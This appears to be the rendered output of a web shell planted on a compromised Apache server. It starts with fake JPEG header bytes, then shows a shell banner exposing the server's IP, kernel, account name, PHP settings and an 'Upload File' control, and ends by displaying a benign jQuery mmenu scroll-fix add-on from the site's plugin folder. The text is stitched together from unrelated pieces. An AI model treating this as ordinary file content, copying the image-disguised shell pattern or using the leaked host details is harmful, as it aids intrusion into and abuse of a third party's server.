ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/public_html/public/plugin/mmenu/core/scrollbugfix/ |
Upload File : |
/*
* jQuery mmenu scrollBugFix add-on
* mmenu.frebsite.nl
*
* Copyright (c) Fred Heusschen
*/
!function(o){var t="mmenu",n="scrollBugFix";o[t].addons[n]={setup:function(){var s=this.opts[n];this.conf[n];r=o[t].glbl,o[t].support.touch&&this.opts.offCanvas&&this.opts.offCanvas.blockUI&&("boolean"==typeof s&&(s={fix:s}),"object"!=typeof s&&(s={}),s=this.opts[n]=o.extend(!0,{},o[t].defaults[n],s),s.fix&&(this.bind("open:start",function(){this.$pnls.children("."+e.opened).scrollTop(0)}),this.bind("initMenu:after",function(){this["_initWindow_"+n]()})))},add:function(){e=o[t]._c,s=o[t]._d,i=o[t]._e},clickAnchor:function(o,t){}},o[t].defaults[n]={fix:!0},o[t].prototype["_initWindow_"+n]=function(){var t=this;r.$docu.off(i.touchmove+"-"+n).on(i.touchmove+"-"+n,function(o){r.$html.hasClass(e.opened)&&o.preventDefault()});var s=!1;r.$body.off(i.touchstart+"-"+n).on(i.touchstart+"-"+n,"."+e.panels+"> ."+e.panel,function(o){r.$html.hasClass(e.opened)&&(s||(s=!0,0===o.currentTarget.scrollTop?o.currentTarget.scrollTop=1:o.currentTarget.scrollHeight===o.currentTarget.scrollTop+o.currentTarget.offsetHeight&&(o.currentTarget.scrollTop-=1),s=!1))}).off(i.touchmove+"-"+n).on(i.touchmove+"-"+n,"."+e.panels+"> ."+e.panel,function(t){r.$html.hasClass(e.opened)&&o(this)[0].scrollHeight>o(this).innerHeight()&&t.stopPropagation()}),r.$wndw.off(i.orientationchange+"-"+n).on(i.orientationchange+"-"+n,function(){t.$pnls.children("."+e.opened).scrollTop(0).css({"-webkit-overflow-scrolling":"auto"}).css({"-webkit-overflow-scrolling":"touch"})})};var e,s,i,r}(jQuery);